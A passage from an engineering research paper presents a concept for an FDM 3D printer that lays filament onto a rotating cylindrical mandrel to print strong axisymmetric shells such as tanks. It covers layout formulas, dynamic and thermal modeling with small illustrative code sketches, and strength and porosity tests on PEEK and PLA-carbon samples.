that the use of printed elements in working structures requires additional solutions to the problems of printing accuracy (ensuring the quality of IT dimensions, the relative position of surfaces (IT/2), accuracy of form (IT/2…IT/3), surface roughness (Rz, Ra)) and of ensuring the strength of the extruded material σm and the interlayer strength σa. The authors of paper [21] have shown that during the FDM process with PEEK-type plastic, the surface morphology is directly affected by the melt pressure tr, due to the filament feed rate vf and the extrusion diameter dc. Moreover, with increasing melt pressure, the number of surface defects decreases. However, the fluctuating extrusion force is the main limitation on the stability of the extrusion process. The maximum filament compression force tr determines the maximum extrusion speed, and the minimum extrusion force is the main determining factor of slippage. Below an extrusion speed of 109.8 mm/min, the extrusion characteristic is in a relatively stable state. In this situation, fiber of diameter Df can provide an extrusion force that maintains the melt flow stably and continuously. During extrusion, a change in the size of the heated nozzle is observed, which is found to correlate with the instability of the PEEK thread size. There is a good linear relationship between the extrusion speed and the diameter of the extruded thread in the range of extrusion speeds 5 mm/min < Ve < 80 mm/min. This is generally well correlated with the results obtained in [22]. Experiments confirm that the laying angle and layer thickness δs have a significant effect on the strength and elongation in tension, compression and three-point bending. Optimal mechanical properties of PEEK are found in samples with a layer thickness of 300 μm and a laying angle of 0/90. The mechanical properties of PEEK and ABS samples are compared. It is concluded that the strength characteristics of the researched parts are lower for products obtained by 3D printing compared with the same samples created from raw materials by thermoplastic molding machines. It is noted that the tensile strength of the printed PEEK sample is about 56 MPa, which is equivalent to the strength of nylon parts in die casting. At the same time, the mechanical properties of printed PEEK samples (in tension, compression and bending) are higher than those of ABS samples printed by commercial 3D printers by 108%, 114% and 115%, respectively, with almost no significant difference between the compression and bending moduli of PEEK and ABS. In [23] the results of research on the influence of fiber laying orientation on the quality of the surface are given; in particular, a geometrical model is presented for determining the roughness profiles obtained at various print orientation angles in FDM
processes. The surface quality is assessed by the average height of the roughness profile (parameter Ra). The authors formulate the following conclusions: 1) at small print orientation angles, regular profiles are obtained in which the peak amplitude corresponds to the layer height; at large print orientation angles, the peak width increases, forming a flat area or a gap between successive peaks; 2) the aliasing-step effect is a general trend inherent in both the simulated and the experimental values of the amplitude roughness; the increments grow with increasing print orientation angle, and after reaching π/3 the aliasing begins to decrease; 3) the shape of the profile curve changes depending on the laying angles. Assuming that the difference in the properties of printed samples is due to the weakening of the adhesive bond between the layers of material after hardening, some researchers have studied the process of spreading the layers and its effect on the mechanical properties of the product and on printing accuracy. The most thorough paper is [24], which obtains a number of patterns from a comparison of the layering processes in FDM printing for ABS and PLA plastics. The main finding is the anisotropy of the properties of products oriented in a particular way relative to the main basis vectors of the printer, i.e.

[\sigma_x] \neq [\sigma_y] \neq [\sigma_z]; \quad [\sigma_i] = f(i, j, k). \quad (1)
Therefore, we can assume that new possibilities for printing important products lie both in the morphological analysis of filament-laying methods and in new layout solutions for such machines. That is why publications have recently begun to appear in which it is proposed to move from a three-coordinate manipulator to more complex ones, mainly five-coordinate ones. Based on the hypothesis, supported in several works, that mechanical properties depend on the topology of the filament layout, researchers are trying to propose new printer designs that allow the layout to be carried out rationally, including with additional rotary axes. Thus, in [25, 26] the expediency of using 5-axis printers for forming curved surfaces is substantiated: such surfaces have a lower roughness at small contour elevation angles (when the elevation angle is only 3…5°), and some surfaces are proposed to be formed by correcting the parameter δ (the distance from the laying surface to the exit of the extruder nozzle), as shown in [27, 28]. Special software is discussed in [29], and a typical design is given in [30]. The authors conclude that the practice of using multi-coordinate printers will soon be common. The same conclusion is supported in [31], where, based on a comparison of printing characteristics, an increase in the strength parameters of products printed on 5-axis printers is shown. It can be concluded that the use of 5-axis systems can significantly expand the topological possibilities of laying out the filament and thereby increase the resulting strength of products. The authors of [32] prove that the use of such multi-coordinate systems is most expedient for case products and products with thin curved surfaces. A separate category of
products to which increased strength requirements are imposed is axisymmetric shells (tanks) used in aviation, astronautics, and medicine [33]. Considering that for such products it is traditionally the outer surface with the tank fastening elements (for the flange, shut-off and control valves) that matters, and that the production volume is a small or medium batch, the use of new approaches and printing methods is relevant. Such tanks, made by winding carbon or glass thread onto a liner with subsequent impregnation with multi-component resins, require expensive technological equipment, which makes their cost uncompetitive compared with tanks obtained by conventional technologies. It is precisely for producing such tanks that additive processes are promising, although a number of problems related to strength, reliability, chemical neutrality, etc. must first be solved. The purpose of the article is to develop a conceptual solution for a printer that allows the formation of axisymmetric shells of increased strength and density by changing the topology of the filament layout. The object of research is the process of FDM printing. The subject of research is a printer of a new type with a liner collapsible table for laying out axisymmetric shells of increased strength.
2 Materials and Methods Attempts to systematize the mechanical systems used in 3D printers are given in [32]. In our opinion, however, the number of options for implementing carrier systems can be expanded significantly by using the approaches to the analysis of structural and kinematic schemes proposed in [34, 35]. To describe the layout of processing equipment, structural formulas based on the following principles are usually used. According to the ISO standard [36], the Z coordinate axis is always taken parallel to the axis of the main spindle, regardless of its location (Fig. 2); for FDM equipment, the extruder plays the role of such a spindle. The positive direction of the Z axis is from the workpiece to the tool (for the extruder, from the nozzle cut to the laying surface), and the X axis is always taken horizontal; the position of the Y axis is determined by the other two axes. Additional movements parallel to the X, Y, Z axes are denoted as U, V, W (secondary) and P, Q, R (tertiary), respectively. Rotations around the X, Y, Z axes are denoted as A, B, C, and additional ones as D, E. Movable blocks are given the same letters as the coordinate movements they perform (form-generating in capital letters, auxiliary in lowercase). The stationary block is marked O, which emphasizes the lack of movement. In structural formulas, the notation is written in the order of the blocks: the block carrying the workpiece is written on the far left, the extruder on the far right, and the stationary block O separates the movements performed by the workpiece from those performed by the extruder. A parsing sketch of this notation is given below.
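To make the notation concrete, the following minimal sketch (not part of the original paper) splits a structural formula at the stationary block into the workpiece-side and extruder-side movement chains; it accepts both the Cyrillic and the Latin form of the letter O, since the formulas in Table 2 mix the two alphabets.

```python
# A minimal sketch: splitting a layout structural formula at the stationary
# block O into workpiece-side and extruder-side movement chains.
def split_layout(formula: str):
    # Table 2 mixes the Cyrillic 'О' and the Latin 'O'; accept both.
    for sep in ("О", "O"):
        if sep in formula:
            workpiece, _, extruder = formula.partition(sep)
            return workpiece, extruder
    raise ValueError("no stationary block O in formula")

# Option 6 from the text: the workpiece carries X and Y, the extruder carries Z.
print(split_layout("ЗхуХYОPzZ"))   # -> ('ЗхуХY', 'PzZ')
```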
Fig. 2. The coordinate system used to describe structural formulas
The distribution of elementary movements between the workpiece and the extruder depends on the position of the stationary block in the layout. From this point of view, we have the following printer layouts for linear movements (Table 2). The inversion of movable blocks, i.e. assigning certain coordinate motions to the workpiece blocks instead of the extruder blocks, shows that options 1–4 already exist (the second and third options are not widespread; the fourth option is three-axis control (X, Y, Z)). Option 6 is noteworthy (option 5 is less technological): ЗхуXYОPzZ implies feed movements of the workpiece installed in the horizontal plane, while the extruder can compensate for the workpiece thickness by moving along the Z coordinate. On the basis of the genetic and morphological analysis of the embodiments of printer carrier systems, we have several options that are the simplest and most suitable for the main task: printing axisymmetric shells with high strength parameters. If we take into account that the axisymmetric shells of greatest practical interest are made by winding a reinforcing thread (or fabric in the form of tape, Fig. 3) onto a liner, we add rotational motions about the y and x axes and obtain a device corresponding to the formula abOzx and to Fig. 4. The process parameters remain the same: table temperature Ts, temperature in the extruder Tr, head linear movement dynamics (its speed vs and speed fluctuations), and filament properties. The printing process can be as follows. Pre-printed flanges are installed on the table mandrel on both sides; the mandrel is placed in the center of the working traverse and fixed. Then the traverse is placed horizontally, the head is brought to the optimal distance, and the process of laying out the filament begins with the rotation of the mandrel about a. When the laying process is completed, a rotation by angle β is performed with simultaneous movement of the head by the value z, which allows connecting the flange with the cylindrical part of the tank due to the movements a, b and z.
Table 2. Some layouts obtained on the basis of rearrangement of moving blocks (the Draft column with the layout sketches is omitted)

No. | Formula | Description | Note
1 | ЗхуОXYPz(z) | The workpiece is stationary in the XOY plane; movable extruder; setting movement along z | Typical printer layout
2 | ЗхуXОYPz(z) | The workpiece moves along X, the movable extruder moves along Y; the setting movement is z | Known layout 2ЗхуХО(у)Pz(z) – operation with two extruders
3 | ЗхуYОXPz(z) | The workpiece moves along Y, the extruder moves along X; the setting movement is z | Also known layout ЗхуYО(x)Pz(z) – laying filament in the horizontal plane
4 | ЗхуОXYZPz | The workpiece is stationary in the XOY plane; the extruder performs all coordinate movements | Types: 2ЗхуYОXZPz; 4ЗхуYОXZPz
5 | ЗхуХYОPz(z) | The workpiece performs controlled movements; the setting z-coordinate is performed by the extruder | –
6 | ЗхуХYОPzZ | The workpiece performs controlled movements; the Z coordinate is provided by the extruder | The most interesting layout, corresponding to a system with a manipulator for printing
7 | ЗхуХYZОPz | The workpiece performs all the movements | Layout with a movable platform
Fig. 3. Spiral winding of an axisymmetric workpiece: 1 – mandrel (liner), 2 – folder, 3 – prepreg tape or reinforcing thread
Fig. 4. FDM printer layout for printing cylindrical shells (tanks) with end rounds (the figure marks the governing factors: filament properties and type, temperature in the extruder, conditions for moving the working body, the dynamic elastic system, and the temperature at the laying place on the table)
Thus, due to the angular motion β and the motions a, b and z, it is possible to form a complete profile of the axisymmetric tank with different elements of the surface layer, as well as tanks with an internal honeycomb system. The latter is extremely important for the manufacture of cryogenic and thermostatic tanks by this method (for example, for holding certain cryogenic liquids, fuels, etc.). In addition, the use of the proposed system makes it possible to manufacture tanks (cylinders) with automatic bonding of individual layers, which is achieved by rational laying parameters that create the required thermal stresses after cooling.
3 Experiments It is known [23] that the strength, accuracy and quality of the surface layer are determined by the conditions of laying the filament on the base P, by the heat transfer processes on the table T(t) (plastic hardening phenomena), and by the dynamic phenomena of the manipulation system ζ(t). The following relations are true:

Rzi = f(P, T(t), ζ(t)), Rzi ∈ Rz; σi = f(P, T(t), ζ(t)), σi ∈ σ; δi = f(P, T(t), ζ(t)), δi ∈ δ. (2)
The set P is determined on the basis of known regularities and regression equations relating the controlled parameters Rzi, σi, δi to the printing modes [22], while the functions T(t) and ζ(t) are obtained from the known equations of thermal conductivity and heat and mass transfer, as well as from dynamic modeling of the manipulation system and the carrier system of the printer under the action of inertial loads, concentrated masses, and forces of useful resistance. A technical solution for the printing machine is developed to determine possible dynamic perturbations according to the scheme in Fig. 4; it is presented in Fig. 5. In order to study the dynamic phenomena in the proposed printer concept, dynamic modeling of the system is performed in the Matlab Simulink environment; the elements of the machine are divided into separate dynamic modules (Fig. 5b) interconnected by dynamic relations. This division is quite conditional, but it makes it possible to track the basic patterns of dynamic phenomena and processes during printing, as well as to establish the boundaries and conditions of continuous operation of the printer. As examples of the created models, the subsystem of the horizontal movement of the desktop as the most massive module (bodies 4 and 3, Fig. 5(b)) and the subsystem of the vertical movement of the carriage (bodies 1 and 2, Fig. 5(b)) are considered. Calculation models of these modules are presented in Fig. 6. The concentrated masses are reduced to the extruder m1 and the horizontal movement frame m2, which is joined to the vertical beam of the base (in the block of movement of the extruder axes x, z on the vertical beam of the printer); for the second module, to the horizontal support table m3 and the rotating table m4, the connections between which are the most rigid due to the hinges used. Systems of differential equations of motion of the concentrated masses are composed for the vertical and horizontal systems of bodies of each analyzed module. For the first module, the differential equations have the form [26]:

m_1 \ddot{z}_1 = m_1 g - P_v - c_1(z_1 - z_2) - b_1(\dot{z}_1 - \dot{z}_2),
m_2 \ddot{z}_2 = m_2 g - c_2 z_2 - b_2 \dot{z}_2 + c_1(z_1 - z_2) + b_1(\dot{z}_1 - \dot{z}_2). (3)

The second system of differential equations (horizontal) also takes into account nonlinear friction forces arising in the guides of longitudinal movement (Fig. 6b), which
Fig. 5. The concept of the machine (a) and its division into dynamic modules (b); the figure labels bodies 1–4 that form the modules discussed in the text
Fig. 6. Models of the machine blocks with the external forces acting on the bodies: (a) the first (vertical) module; (b) the second (horizontal) module
is reduced to the standard form for further modeling:

m_4 \ddot{z}_4 = -P_h - \mu m_4 g\,\mathrm{sgn}(\dot{z}_4) - c_3(z_4 - z_3) - b_3(\dot{z}_4 - \dot{z}_3),
m_3 \ddot{z}_3 = -\mu m_3 g\,\mathrm{sgn}(\dot{z}_3) - c_3 z_3 - b_3 \dot{z}_3 + c_3(z_4 - z_3) + b_3(\dot{z}_4 - \dot{z}_3). (4)
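As a cross-check of these models outside Simulink, the following minimal sketch (not from the paper) integrates the vertical module (3) numerically with the parameter values of Table 5; the zero initial conditions and the integration window are assumptions.

```python
# A minimal sketch: numerical integration of the vertical two-mass module (3)
# with the parameter values of Table 5; initial conditions are assumed zero.
from scipy.integrate import solve_ivp

m1, m2 = 6.0, 15.5          # kg (Table 5)
c1, c2 = 2e6, 4e6           # N/m
b1, b2 = 300.0, 600.0       # N*s/m
Pv, g = 0.3, 9.81           # N, m/s^2

def rhs(t, y):
    z1, v1, z2, v2 = y
    a1 = (m1*g - Pv - c1*(z1 - z2) - b1*(v1 - v2)) / m1
    a2 = (m2*g - c2*z2 - b2*v2 + c1*(z1 - z2) + b1*(v1 - v2)) / m2
    return [v1, a1, v2, a2]

sol = solve_ivp(rhs, (0.0, 0.5), [0.0, 0.0, 0.0, 0.0], max_step=1e-4)
# after the transient decays, z2 tends to the static deflection ~ (m1+m2)*g/c2
print(sol.y[2][-1], (m1 + m2) * g / c2)
```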
The models of the reduced systems of differential equations implemented in the Matlab Simulink environment are presented in Fig. 7a, b; Fig. 7b shows only the fragment that takes into account the nonlinearity of the friction forces. Modeling of the heat transfer process in the elements of the studied structure is performed in the ANSYS software environment. The calculation is based on the numerical solution of the initial-boundary value problem for the thermal conductivity equation [19]:

\rho c\,\frac{\partial T}{\partial \tau} = \frac{\partial}{\partial x}\left(\lambda_x \frac{\partial T}{\partial x}\right) + \frac{\partial}{\partial y}\left(\lambda_y \frac{\partial T}{\partial y}\right) + \frac{\partial}{\partial z}\left(\lambda_z \frac{\partial T}{\partial z}\right), (5)

where T(τ, x, y, z) is the temperature distribution function; λx, λy, λz are the thermal conductivity coefficients in the directions of the x, y, z axes; ρ is the density and c is the specific heat of the medium. The calculation of the deformations of the table elements is made taking into account the volumetric expansion coefficient β = (1/V)(dV/dT)_p.
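For orientation, a minimal one-dimensional explicit finite-difference sketch of (5) is given below; it is not from the paper, and the material constants, grid and boundary temperatures are purely illustrative.

```python
# A minimal 1-D explicit finite-difference sketch of the heat conduction
# equation (5); constants are illustrative, not the paper's values.
import numpy as np

lam, rho, c = 200.0, 2700.0, 900.0   # W/(m*K), kg/m^3, J/(kg*K): aluminum-like
alpha = lam / (rho * c)              # thermal diffusivity, m^2/s
dx, dt, n = 1e-3, 1e-3, 200          # dt is below the stability limit dx^2/(2*alpha)
T = np.full(n, 20.0)                 # initial temperature field, deg C
T[0] = 140.0                         # heated side (fixed boundary)
for _ in range(10000):
    T[1:-1] += alpha * dt / dx**2 * (T[2:] - 2*T[1:-1] + T[:-2])
print(T[:5])                         # temperatures near the heated wall
```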
Based on model experiments, a simplified rotating table-drum with an outer diameter of 100.0 mm is made (Fig. 8). The basic ENDER 3 PRO printer is used for the research, on which a rotating table is additionally installed; the movement along the Y coordinate is switched to the setting-up (adjustment) mode, and the printer driver is instead connected to the rotating coordinate R, with corresponding reprogramming of the movement controller. Movements along the X and Z coordinates remain unchanged. The print head is also modified to ensure heating up to 430 °C. For PLA-carbon material with the properties given in Table 3, the print modes are: vp = 50 mm/s, T0 = 75 °C, Te = 225 °C; for PEEK plastic (Table 4): vp = 40 mm/s, T0 = 140 °C, Te = 430 °C. The laying density is 80%, with full filling along the outer contour. Several workpieces are laid: both standard test specimens to check the strength characteristics and cellular systems (Fig. 9).
4 Results Table 5 contains the values of the stiffness and damping parameters, as well as the values of the concentrated masses. The reduced masses m1−4 (kg) are taken from the three-dimensional assembly model in SolidWorks; the stiffness values c1−4 (N/m) and damping factors b1−4 (N·s/m) are taken approximately for this type of machine. The modeling results (Figs. 10, 11) allow several important conclusions. The vertical movement module of the print head is sufficiently stable in operation, because the movement rate is quite low, and the nonlinearity of the friction forces can be neglected: they are much smaller than the gravitational forces that the drive (a stepper motor with a ball-screw transmission) must overcome. Transient processes (Fig. 10) after a change in the motion conditions cause short-term fluctuations of small amplitude, which attenuate quickly. The force Pv that occurs during printing is relatively small and may be neglected. The stability and steadiness of the system remain satisfactory over the entire range of displacements, speeds and positions. Considering the nonlinear friction forces changes the picture of the transient processes quite significantly (Fig. 11). When the working body moves, the value of the friction force does
Fig. 7. Simulink models for solving the systems of differential equations of the analyzed 3D-printer modules: (a) vertical; (b) horizontal
Fig. 8. Embodiment of a cylindrical table for laying
Table 3. The properties of PLA-carbon materials

Properties | ASTM | Test Condition | Units | Typical Values
Mechanical:
Tensile Strength | D638 | 50 mm/min | MPa | 56
Elongation | D638 | 50 mm/min | % | 9
Flexural Strength | D790 | 2 mm/min | MPa | 89
Flexural Modulus | D790 | 2 mm/min | MPa | 2570
Impact Strength, IZOD notched | D256 | 3.2 mm, 23 °C | kJ/m² | 3.4
Thermal:
Heat Distortion Temp | D648 | 0.45 MPa, 6.4 mm | °C | 130–140
Others:
Melt Flow Rate | D1238 | 190 °C, 2.16 kg | g/10 min | 5
Specific Gravity | D792 | 23 °C | g/cm³ | 1.282
Mold Shrinkage | D955 | 23 °C | % | 0.5
not change; only its direction changes, opposing the direction of movement of the module elements. However, they are sufficiently inertial for the point connection of a horizontally moving table and a rotating drum. Changing the dynamic parameters of the model, i.e. increasing the stiffness of the joints between the drum and its holding elements, results in improved dynamic properties of the entire system: the frequency and amplitude of the oscillations decrease. Applying braking algorithms to the working bodies at the end of the working stroke, in coordination with the connected drives, also has a positive effect. Thus, it can be stated that satisfactory dynamics of the printer of the proposed concept can be achieved by appropriate technical solutions.
Table 4. The properties of PEEK-plastics

Indicators | TECAPEEK (PEEK) | TECAPEEK HT (PEK) | TECAPEEK ST (PEKEKK)
Tg | 150 °C | 160 °C | 165 °C
Density | 1.31 g/cm³ | 1.31 g/cm³ | 1.32 g/cm³
Modulus of elasticity | 4,200 MPa | 4,600 MPa | 4,600 MPa
Operating temperature, const | 260 °C | 260 °C | 260 °C
Operating temperature, short | 300 °C | 300 °C | 300 °C
Minimal operating temperature (switch off at t down to −100 °C, increased fragility) | −40 °C | −40 °C | −40 °C
Tensile strength of filament, MPa, 50 mm/min | 97 MPa | 103 MPa | 86 MPa
Fig. 9. Workpieces obtained by printing on different bases: (a) test specimens; (b) honeycombs laid out on a flat base; (c) the honeycomb is formed on both flat and cylindrical bases; (d) fuel tank demonstrator
The models of the systems of differential equations created in the Matlab Simulink environment can be used to model the dynamic processes for forecasting the processing errors and improving the design; both two-mass elastic-damping nonlinear models require specification of the dynamic characteristics (masses mi, stiffnesses ci and damping factors bi) to improve the accuracy; the necessary transfer functions can be obtained from the models by means of the Linear Analysis Tool. To determine the static deformations and errors that will be introduced into the overall balance of inaccuracies in the reproduction of the printed workpiece, a static analysis of the carrier system is performed in the Autodesk Inventor environment. The parts' own weight and the dynamic loads on the elements during operation of the printer are used as the loading; the static forces arising during printing are neglected. A "Clamping" support is assigned to the lower base plate. The mesh and contacts are created
Table 5. Dynamic parameters of models

Characteristic, measurement unit | Values
m1, kg | 6
m2, kg | 15.5
m3, kg | 15
m4, kg | 4.5
c1, N/m | 2·10^6
c2, N/m | 4·10^6
c3, N/m | 2·10^6
c4, N/m | 4·10^6
b1, N·s/m | 300
b2, N·s/m | 600
b3, N·s/m | 300
b4, N·s/m | 600
Pv, N | 0.3
Ph, N | 0.1
Fig. 10. The results of modeling the vertical module: (a) change of the coordinates z1 and z2 in the period of oscillation damping; (b) the value of the coordinate, speed and acceleration of the first body in the period of oscillation damping
Fig. 11. The results of modeling the horizontal module: (a) change of the coordinates z3 and z4 in the period of oscillation damping; (b) the value of the coordinate, speed and acceleration of the first body in the period of oscillation damping
automatically. The mesh geometry is corrected to even out the level of detail of all the objects (Fig. 12). Among the automatically created "Connected" contacts, the contacts of the guides and carriages are selected separately and their type is changed to "Sliding without separation", which better matches their real behavior. The analysis of the obtained results shows that the problems of significant displacement of points during the operation of the printer concern not only the rotating
table (relative to the longitudinally movable table), but also the "print head-guide" system. This result requires additional design measures to prevent critical deformation and increase printing accuracy. Accounting for thermal phenomena from the heated working table (drum), based on (5), has made it possible to introduce the nonlinear deformations of the table elements into the balance of errors. Uniform heating of the support drum is possible only when the heater (for example, in the form of a rod) is immovably fixed under the surface of rotation and connected to the cantilever supports holding the drum. The maximum predicted thermal deformations for the structure whose dimensions are shown in Fig. 8, at an average temperature Ts = 135…140 °C, are 0.14 mm in the radial direction and 0.29 mm along the axis. The latter is fully compensated by the movement of the print head and is comparable to the error of linear movement along the y axis.
Fig. 12. Mesh model of the printer (a) and the total displacement of element points during operation (b)
Metrological inspection of printed samples shows that when printing on a flat table, the printing error for linear dimensions is within accuracy grades IT9–IT10 and makes Tl = 0.15…0.17 mm; the scattering of vertical dimensions is Th = 0.18–0.2 mm. Diametrical dimensions (holes) are made with a scattering Tv = 0.18 mm. All the dimension scatterings can thus be brought to one general set, i.e. the scattering follows the normal distribution law. Therefore, under the same conditions, no significant factors affecting the accuracy of form reproduction are identified. Printing on a cylindrical mandrel (table) shows the following results. When laying the filament over lengths of L = 120.0 mm and L = 282.0 mm (the length of the printed cylinder), the actual dimensions are obtained with errors of 0.5 and 0.82 mm, respectively. As for the accuracy of vertical dimensions, there is some growth of Th: for the bore diameter ∅100−0.3 mm, Th = 0.24…0.32 mm.
Table 6 shows practical average values of mechanical tests for 3D-printed PEEK and PLA-Carbon samples. The tests give almost the same results as in paper [18]. Samples made with a layer thickness of 300 μm have the highest strength in all mechanical tests; the strength of samples with a layer thickness of 400 μm is lower, which is especially clear on PEEK plastic cracks. The laying angle also has a significant impact, although smaller than in the results of paper [18]. The greatest strength is achieved when the plastic is laid in the plane of the load. The lowest values of fracture toughness are obtained at normal separation by a force F perpendicular to the layer-by-layer spreading. It is found that for a heater temperature T = 160 °C, a heat flow q = 2.3 × 10⁻⁴ W and an internal power source of 2.3 × 10⁵ W/m³, mounted with a gap of 0.25 mm from the outer wall of 3.2 mm thickness, with uniform rotation of the aluminum drum at a speed of 2…3 s⁻¹, a satisfactorily uniform temperature distribution within T = 147…153 °C is obtained (Fig. 13).
Fig. 13. The distribution of temperature fields by cross section in modeling heat transfer (ANSYS 18.2)
The main conclusions after the modeling are as follows: changing the dynamic parameters determines the form accuracy, and the dynamic phenomena of acceleration and deceleration of the rotating and linearly moving masses have a greater impact on the layer density than in traditional devices, which requires special control algorithms in transient modes. The modeling considers the nonlinearity of the emerging friction forces, the temperature deformations from heating the table and extruder, the cooling dynamics of the finished product, the errors in the elements of the transverse movement drive, and the limited stiffness of the "base-nozzle-extruder" chain. It is established that for standard components and the NEMA17 1.7A 17HS4401 motor, at a thread speed of 120…150 mm/min, the reverse of the transverse carriage stroke (body 1, Fig. 5b) produces a displacement error of up to 0.8 mm, which can cause an inter-turn cavity.
There is a significant difference in the strength of products obtained by laying on a flat table and on a cylindrical surface (Table 6). This is confirmed by the analysis of variance of the sample parameters σi. It should be noted that the strength indicators generally correspond to the calculated values only in the case of laying the filament on a cylindrical table, when σbmax^PEEK = 73.8 MPa and σbmax^PLA-C = 42.3 MPa ([σ]^PEEK = 64…69 MPa and [σ]^PLA-C = 36…42 MPa are the calculated values). Another important conclusion indicating the feasibility of using a printer with a cylindrical table is that, as can be seen from Table 6, laying the filament at angles other than ±π/4 provides a lower strength of the product.

Table 6. The results of sample tests at different loads
Material, layout | Parameters | Tensile strength (MPa) | Bending strength (MPa) | Compressive strength (MPa)
PEEK | Layer thickness 250 μm | 48.6 | 55.8 | 52.4
PEEK | Layer thickness 300 μm | 54.8 | 58.3 | 58.2
PEEK | Layer thickness 350 μm | 46.2 | 47.9 | 55.7
PEEK, flat table, layer thickness 300 μm | 0/90* | 50.8 | 56.1 | 59.8
PEEK, flat table, layer thickness 300 μm | +45/−45 | 46.8 | 48.5 | 55.2
PEEK, flat table, layer thickness 300 μm | +30/−60 | 45.9 | 43.2 | 54.7
PEEK, cylindrical table | +45/−45 | 73.8 | – | –
PEEK, cylindrical table | 0/90* | 69.3 | – | –
PLA-C | Layer thickness 250 μm | 28.6 | 33.3 | 32.8
PLA-C | Layer thickness 300 μm | 32.4 | 34.3 | 31.2
PLA-C | Layer thickness 350 μm | 30.9 | 32.2 | 29.5
PLA-C, flat table, layer thickness 300 μm | 0/90* | 33.1 | 32.7 | 34.8
PLA-C, flat table, layer thickness 300 μm | +45/−45 | 34.6 | 34.5 | 35.2
PLA-C, flat table, layer thickness 300 μm | +30/−60 | 29.4 | 31.5 | 34.7
PLA-C, cylindrical table | +45/−45 | 42.3 | – | –
PLA-C, cylindrical table | 0/90* | 38.8 | – | –
* for a linear specimen tested along the filament lay-out direction.
Layout on a flat table gives much lower performance: σbmax^PEEK = 54.8 MPa, σbmax^PLA-C = 34.6 MPa. It should be noted that this strength is less than that stated by the filament manufacturer, amounting to up to 72% of it for PEEK and up to 89% for PLA-C (the case of a normal tensile force applied statically). This agrees with the results reported in [37].
5 Discussion Experimental research of printing on a cylindrical liner demonstrates the efficiency of forming axisymmetric shells by the FDM method. Mechanical tests of tank demonstrators also show a strong dependence of the strength indicators on the thickness of the printed layer (Table 6), on the topology of laying out the filament on the table, and on the laying conditions, primarily on the quality of the adhesion sites formed during extrusion. Of course, the question may arise whether the essence of printing is preserved when such bases are used, because only a cylindrical blank of one inner diameter, corresponding to the diameter of the liner, can be obtained. It should be noted, however, that this method makes it possible to form any internal structure of the shell wall. For example, it can be honeycomb cavities, which, on the one hand, provide high thermal insulation properties and, on the other hand, provide auto-bonding of the two shells, which redistributes stresses and, accordingly, increases the strength of the product as a whole. The research of the strength characteristics of products obtained by FDM processes on two printers, one of which is made according to the proposed concept, proves that the latter can be successfully used for the manufacture of axisymmetric shells, in particular tanks with central holes. However, the main condition for the strength of such products is to provide a filament laying scheme that achieves strength indicators not worse than 0.75…0.85 of the material strength [σ]. Comparison of the strength characteristics [σ], σb of cylindrical shells obtained by building up the height along the z coordinate with shells grown on a cylindrical mandrel in the cross section of the layer thickness h proves that laying the filament at angles ±π/4 gives the maximum durability of a product under operating loads. However, the concept of the working machines for FDM printing needs to be changed, because implementing the laying of the filament on the cylinder alone is insufficient. The problem of installing flanges on the ends of the cylinder, which will later be closed by covers, also requires a solution. Another important parameter is the porosity of the resulting product, which manifests itself in incomplete contact between the stacked layers. Figure 14 shows optical micrographs of the structure of the end face of the product obtained on a traditional printer (Fig. 14(a)) and on the proposed one (Fig. 14(b)).
Fig. 14. The structure of the end face of the product (×40) obtained on a traditional printer (a) and on the proposed one (b)
It is easy to see that in the latter case the porosity is smaller, and the individual deviations in the laying are most likely determined by horizontal oscillations (Fig. 9) and, to a lesser extent, by vertical oscillations (Fig. 8) of the extruder. The study of the mass-weight characteristics has shown that for all samples the decrease in porosity is significant: the density of the workpiece increases from 1.09 g/cm³ to 1.23 g/cm³ (with a dispersion parameter of 0.054 g/cm³). Therefore, further research should be aimed at ensuring rational parameters of layer adhesion by means of the temperature fields, as well as the kinematic parameters of the laying process.
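As a rough cross-check (an illustrative estimate, not a figure from the paper): taking the filament's specific gravity of 1.282 g/cm³ from Table 3 as the pore-free density, the apparent porosity 1 − ρ/ρ0 drops from about 1 − 1.09/1.282 ≈ 15% to 1 − 1.23/1.282 ≈ 4%, which is consistent with the 90–95% density figures quoted in the conclusions.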
6 Conclusions For the first time, the use of morphological analysis and the principle of genetic development of working machine layouts makes it possible to establish new conceptual solutions that achieve the required filament-laying topology without using a significant number of axes. Such a solution is rational for the formation of axisymmetric shells in the form of tanks for various technological purposes; at the same time, the strength of the resulting products is the maximum achievable. The main practical result of the formulated scientific position is a new printer concept, proposed for industrial use, for printing blanks on a base other than a plane, in the form of a collapsible cylinder. The modeling of the printer operation is performed considering the thermophysical and elastic phenomena in the proposed printer system. The conditions of reliable printing and minimization of product voids are established, and it is shown that the use of special control algorithms allows eliminating the density-drop phenomena at the ends of the cylindrical product (keeping the density at 95%). Based on a comparison of computer simulations and micrographs of the transient zones of the product, it is established that the surface density is inhomogeneous and decreases from 95% to 90% at the reverse of the head (at the liner ends), with cavities of up to 0.6 mm caused by the dynamic phenomena of braking and acceleration of the extruder; this requires changing the stiffness and damping parameters in the "extruder base-nozzle" chain. Comparison of the strength of typical elements (shells) laid out on a flat base by building layers along the main axis of the product and on a cylindrical one proves that the proposed concept allows obtaining a product strength of 0.75…0.85 of the material strength [σ]. The strength indicators generally correspond to the calculated values only in the case of laying the filament on a cylindrical table, when σbmax^PEEK = 73.8 MPa and σbmax^PLA-C = 42.3 MPa ([σ]^PEEK = 64…69 MPa and [σ]^PLA-C = 36…42 MPa are the calculated values). Laying on a flat table gives much lower performance: σbmax^PEEK = 54.8 MPa, σbmax^PLA-C = 34.6 MPa; this strength is less than that stated by the filament manufacturer and amounts to up to 72% of it for PEEK and up to 89% for PLA-C (the case of a normal tensile force applied statically). Such characteristics are obtained by laying the thread at angles ±π/4, which also gives the maximum durability of the product under operating loads.
Since the mechanical tests and structural studies obtained using this printer prove its high efficiency (the demonstrators show increased accuracy and density), further work on the device is seen in providing kinematic and design solutions that allow forming not only cylindrical but also cylindroid products, while minimizing the number of controlled axes in the device.
